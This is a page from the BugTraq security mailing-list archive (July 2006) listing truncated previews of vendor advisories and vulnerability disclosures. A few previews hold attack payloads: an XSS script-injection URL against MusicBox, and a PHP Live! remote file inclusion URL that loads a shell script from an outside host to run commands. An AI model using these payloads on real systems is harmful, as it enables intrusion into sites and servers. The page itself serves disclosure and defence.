BugTraq Mode:
(Page 1093 of 1748)  < Prev  1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098  Next >
[SECURITY] [DSA 1123-1] New libdumb packages fix arbitrary code execution 2006-07-24
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1123-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
July 24th, 2006

[ more ]  [ reply ]
SQuery v.x (devi.php) (armygame.php) Remote File Inclusion 2006-07-24
saudi unix hotmail com
=================================================================

SQuery <= 4.5(libpath) Remote File Inclusion Exploit

=================================================================

Worked On : ALL VERSIONS |

[ more ]  [ reply ]
Write-up by Amit Klein: "Forging HTTP request headers with Flash" 2006-07-24
Amit Klein (AKsecurity) (aksecurity hotpop com)
Forging HTTP request headers with Flash

Amit Klein, July 2006

Flash - Introduction
====================

Flash player is a very popular browser add-on from Adobe
(actually, Flash was invented by Macromedia, which was acquired
by Adobe). This write-up covers mostly

[ more ]  [ reply ]
ERRATA: [ GLSA 200607-08 ] GIMP: Buffer overflow 2006-07-24
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [ERRATA UPDATE] GLSA 200607-08:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
Windows XP/NT/SMB2003/2000 Denial of Service attack 2006-07-24
J. Oquendo (joquendo hushmail com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

According to Microsoft the following tool does nothing to Windows
based machines. According to my experience it does. According to
the experience of 5 separate administrators it does as well. You be
the judge of this. Initially this is/was a tool calle

[ more ]  [ reply ]
Heap overflow in the GT2 loader of libmikmod 3.2.2 2006-07-24
Luigi Auriemma (aluigi autistici org)

#######################################################################

Luigi Auriemma

Application: libmikmod
http://mikmod.raphnet.net
http://sourceforge.net/projects/mikmod/
Versions: <= 3.2.2 and current CVS
versions 2

[ more ]  [ reply ]
MusicBox <= 2.3.4 XSS SQL injection Vulnerability 2006-07-24
securityconnection gmail com
MusicBox 2.3.4

http://www.musicboxv2.com

------------

PHPinfo page

------------

/phpinfo.php

--------------------------

Cross Site Scripting (XSS)

--------------------------

http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>
&page=0

http://www.target.xx/index.php?id=><

[ more ]  [ reply ]
[USN-322-1] Konqueror vulnerability 2006-07-24
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-322-1 July 24, 2006
kdelibs vulnerability
CVE-2006-3672
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
U

[ more ]  [ reply ]
Check Point R55W Directory Traversal 2006-07-24
Sec-Tec Lists (zen31438 zen co uk)
Overview

Check Point Firewall-1 R55W contains a hard coded web server, which runs on
TCP port 18264. This server is there to deal with PKI requirements for Check
Point's VPN functionality.

During a routine penetration test of a client, Sec-Tec discovered a
directory traversal vulnerability that al

[ more ]  [ reply ]
[SECURITY] [DSA 1124-1] New fbi packages fix potential deletion of user data 2006-07-24
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1124-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
July 24th, 2006

[ more ]  [ reply ]
Digital Armaments Security Advisory 24.07.2006: Siemens Speedstream Wireless/Router Denial of Service Vulnerability 2006-07-24
info digitalarmaments com
Digital Armaments advisory is 05.4.2006

http://www.digitalarmaments.com/2006310665340982.html

I. Background

The SpeedStream Wireless DSL/Cable Router is usually adopted for home and small business solutions. Together with an existing DSL or cable modem connection, this affordable, easy to use

[ more ]  [ reply ]
Buffer-overflow in the XM loader of Cheese Tracker 0.9.9 2006-07-23
Luigi Auriemma (aluigi autistici org)

#######################################################################

Luigi Auriemma

Application: Cheese Tracker
http://reduz.com.ar/cheesetracker/
http://sourceforge.net/projects/cheesetronic
Versions: <= 0.9.9 and current CVS
Platf

[ more ]  [ reply ]
[SECURITY] [DSA 1121-1] New postgrey packages fix denial of service 2006-07-24
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1121-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
July 24th, 2006

[ more ]  [ reply ]
PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities 2006-07-24
saudi unix hotmail com
-PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities

########################################

By saudi hackrz

---------------------------------------

Exploit :

http://[target]/[path]/setup/header.php?css_path=http://sit/shell.txt?cm
d=ls

-------------------------------------

[ more ]  [ reply ]
[CYBSEC] TippingPoint detection bypass 2006-07-24
Andres Riancho (ariancho cybsec com)
CYBSEC S.A.
www.cybsec.com

Pre-Advisory Name: TippingPoint detection bypass
==============

Vulnerability Class: Design flaw
==============

Release Date: 07/24/2006
==========

Affected Platforms:
=============
* All TippingPoint appliances with TOS <= 2.2.3.6514

Local / Remote: Remote
==========

[ more ]  [ reply ]
[ GLSA 200607-08 ] GIMP: Buffer overflow 2006-07-23
Sune Kloppenborg Jeppesen (jaervosz gentoo org) (1 replies)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200607-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
Re: [ GLSA 200607-08 ] GIMP: Buffer overflow 2006-07-24
Michael Shigorin (mike osdn org ua)
[Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla] 2006-07-23
botan linuxmail org
>>> Kurdish Security

>>> MoSpray Remote File Include Vulnerability

>>> Original Advisory :

http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-
basedir.html

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

>>> Rish : Hi

[ more ]  [ reply ]
Vanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln. 2006-07-23
mfoxhacker gmail com
Vanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln.

########################################################################
##

Vendor : Vanilla CMS

Demo : http://demo.opensourcecms.com/vanilla/

Get Source : http://getvanilla.org/

Vuln type : Remote

Risk : High

############

[ more ]  [ reply ]
[MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities 2006-07-23
admin majorsecurity de
[MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities

------------------------------------------------------------------------
----------------

Software: Woltlab Burning board

Impact: Cookie manipulation and Session Fixation

Made publi

[ more ]  [ reply ]
[SECURITY] [DSA 1120-1] New Mozilla Firefox packages fix several vulnerabilities 2006-07-23
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1120-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
July 23rd, 2006

[ more ]  [ reply ]
Re: Digital Armaments Security Advisory 10.07.2006: Flexwath Authorization Bypassing and XSS Vulnerability 2006-07-21
sales flexwatch com
Thanks for security Advisory.

Report is received by our support team.

We will make a sollution about this issue very soon.

[ more ]  [ reply ]
Re: [Full-disclosure] Re: New PowerPoint Trojan installs itself as LSP 2006-07-21
Juha-Matti Laurio (juha-matti laurio netti fi)
Many thanks for this useful information.
These new type of Trojans are known as Trojan.Riler.F, Win32.Fantador.E etc.

Names available have been updated to the PowerPoint FAQ,
http://blogs.securiteam.com/?p=508

The following description including information about proxy-like feature is worth of che

[ more ]  [ reply ]
Map MS Security Bulletins to MS KB numbers 2006-07-20
Matthew Leeds (mleeds theleeds net)
I'm looking for a resource that maps Microsoft Security Bulletin numbers (such as MS06-033) to Microsoft Knowledge Base numbers (such as KB 917283). I recognize that this may be a one to many mapping since a single SB may point to a set of possible patches depending on OS version or application vers

[ more ]  [ reply ]
Re: [MajorSecurity #22] Top XL <=1.1 - XSS and cookie disclosure 2006-07-20
admin majorsecurity de
Hi there. There's a little mistake in my advisory.

The correct Vendor is: "http://www.derwebgestalter.de/"

and the script is available under

"http://www.derwebgestalter.de/" and ALSO under

"http://www.paddelberg.de/gratis-toplisten-script/"

Thanks for your attention.

David Vieira Kurz

[ more ]  [ reply ]
Blackboard Academic Suite 6.2.23 +/-: Persistent cross-site scripting vulnerability 2006-07-20
harbl hushmail com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I. Affected Software

Blackboard Academic Suite 6.2.3.23
Prior or newer versions may also be affected.
Vendor website: http://www.blackboard.com/

II. Impact

Subjective: Severe
Objective: Privilege escalation

III. Vulnerability

There is a persistent/

[ more ]  [ reply ]
Com Multibanners Remote File Inclusion (mosConfig_absolute_path) 2006-07-20
mail blue-spy net
#############################SolpotCrew Community################################

#

# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

#

# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt

#

##########################################################

[ more ]  [ reply ]
MiniBB Forum <= 1.5a Remote File Include (news.php) 2006-07-20
AG Spider (ag-spider hotmail com)
Title : MiniBB Forum <= 1.5a Remote File Include (news.php)
########################################################################
#######

Discovered By AG-Spider

------------------------------------------------------------------------
-----

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~

[ more ]  [ reply ]
DotClear : Multiples Full Path Disclosure 2006-07-22
Silitix gmail com
# DotClear : Multiples Full Path Disclosure

# Discovred By Silitix - Silitix_gmail_com

# www.Silitix.com

A remote user can access the files directly to cause the system to display

an error message that indicates the full path of the server.

/ecrire/tools/blogroll/edit_cat.php

/ecrire/tool

[ more ]  [ reply ]
(Page 1093 of 1748)  < Prev  1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus